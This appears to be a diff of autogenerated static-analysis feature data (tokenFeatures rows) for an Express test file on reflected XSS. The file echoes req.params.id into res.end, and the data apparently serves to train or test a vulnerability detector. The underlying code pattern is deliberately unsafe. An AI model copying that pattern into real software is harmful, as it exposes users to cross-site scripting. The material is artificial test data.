stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.end | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20500,6 +136382,57 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:25 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:25 | req | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:25 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:32 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:32 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:32 | req.params | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:32 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:32 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:27:39:32 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:27:39:32 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:27:39:32 | params | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:27:39:32 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:27:39:32 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:34:39:35 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:34:39:35 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:34:39:35 | id | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:34:39:35 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:34:39:35 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:7 | res | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:17 | res.setHeader | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:17 | res.setHeader | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:17 | res.setHeader | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:17 | res.setHeader | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:17 | res.setHeader | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | exceptional return of res.set ... =utf8') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | exceptional return of res.set ... =utf8') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | exceptional return of res.set ... =utf8') | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | exceptional return of res.set ... =utf8') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | exceptional return of res.set ... =utf8') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | res.set ... =utf8') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | res.set ... =utf8') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | res.set ... =utf8') | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | res.set ... =utf8') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:5:41:60 | res.set ... =utf8') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:9:41:17 | setHeader | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:9:41:17 | setHeader | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:9:41:17 | setHeader | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:9:41:17 | setHeader | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:9:41:17 | setHeader | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:19:41:32 | 'Content-Type' | CalleeFlexibleAccessPath | res.setHeader | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:19:41:32 | 'Content-Type' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:19:41:32 | 'Content-Type' | contextFunctionInterfaces | textContentType() | @@ -20516,6 +136449,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:35:41:59 | 'text/p ... t=utf8' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:35:41:59 | 'text/p ... t=utf8' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:41:35:41:59 | 'text/p ... t=utf8' | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:7 | res | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:11 | res.end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:11 | res.end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:11 | res.end | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:11 | res.end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:11 | res.end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | exceptional return of res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | exceptional return of res.end ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | exceptional return of res.end ... ams.id) | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | exceptional return of res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | exceptional return of res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | res.end ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | res.end ... ams.id) | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:5:42:36 | res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:9:42:11 | end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:9:42:11 | end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:9:42:11 | end | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:9:42:11 | end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:9:42:11 | end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:19 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:19 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:19 | "FOO: " | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:19 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:19 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:19 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:35 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.end | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:35 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:35 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20524,6 +136488,92 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:35 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:35 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:13:42:35 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:25 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:25 | req | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:25 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:32 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:32 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:32 | req.params | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:32 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:32 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:35 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:35 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:35 | req.params.id | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:35 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:35 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:23:42:35 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:27:42:32 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:27:42:32 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:27:42:32 | params | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:27:42:32 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:27:42:32 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:34:42:35 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:34:42:35 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:34:42:35 | id | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:34:42:35 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:42:34:42:35 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:46:0 | this | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:46:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:46:0 | this | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:46:0 | this | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:46:0 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | 'arguments' object of function textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | 'arguments' object of function textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | 'arguments' object of function textContentType | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | 'arguments' object of function textContentType | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | 'arguments' object of function textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | exceptional return of function textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | exceptional return of function textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | exceptional return of function textContentType | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | exceptional return of function textContentType | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | exceptional return of function textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | functio ... ain";\\n} | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | functio ... ain";\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | functio ... ain";\\n} | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | return of function textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | return of function textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | return of function textContentType | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | return of function textContentType | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:1:48:1 | return of function textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:10:46:24 | textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:10:46:24 | textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:10:46:24 | textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:10:46:24 | textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:10:46:24 | textContentType | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:10:46:24 | textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:46:10:46:24 | textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:8 | result | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:8 | result | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:8 | result | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:8 | result | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:8 | result | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:23 | result ... /plain" | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:23 | result ... /plain" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:23 | result ... /plain" | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:23 | result ... /plain" | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:3:47:23 | result ... /plain" | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:12:47:23 | "text/plain" | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:12:47:23 | "text/plain" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:12:47:23 | "text/plain" | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:12:47:23 | "text/plain" | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:47:12:47:23 | "text/plain" | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:50:3 | app | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:50:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:50:3 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:50:7 | app.get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:50:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:50:7 | app.get | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:58:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:58:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:58:2 | app.get ... \\n }\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:58:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:58:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:1:58:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:5:50:7 | get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:5:50:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:5:50:7 | get | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:9:50:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:9:50:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:9:50:19 | '/user/:id' | calleeImports | express | @@ -20531,6 +136581,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:9:50:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:9:50:19 | '/user/:id' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:9:50:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | textContentType | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | textContentType | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | this | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | this | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:50:21 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | 'arguments' object of anonymous function | fileImports | 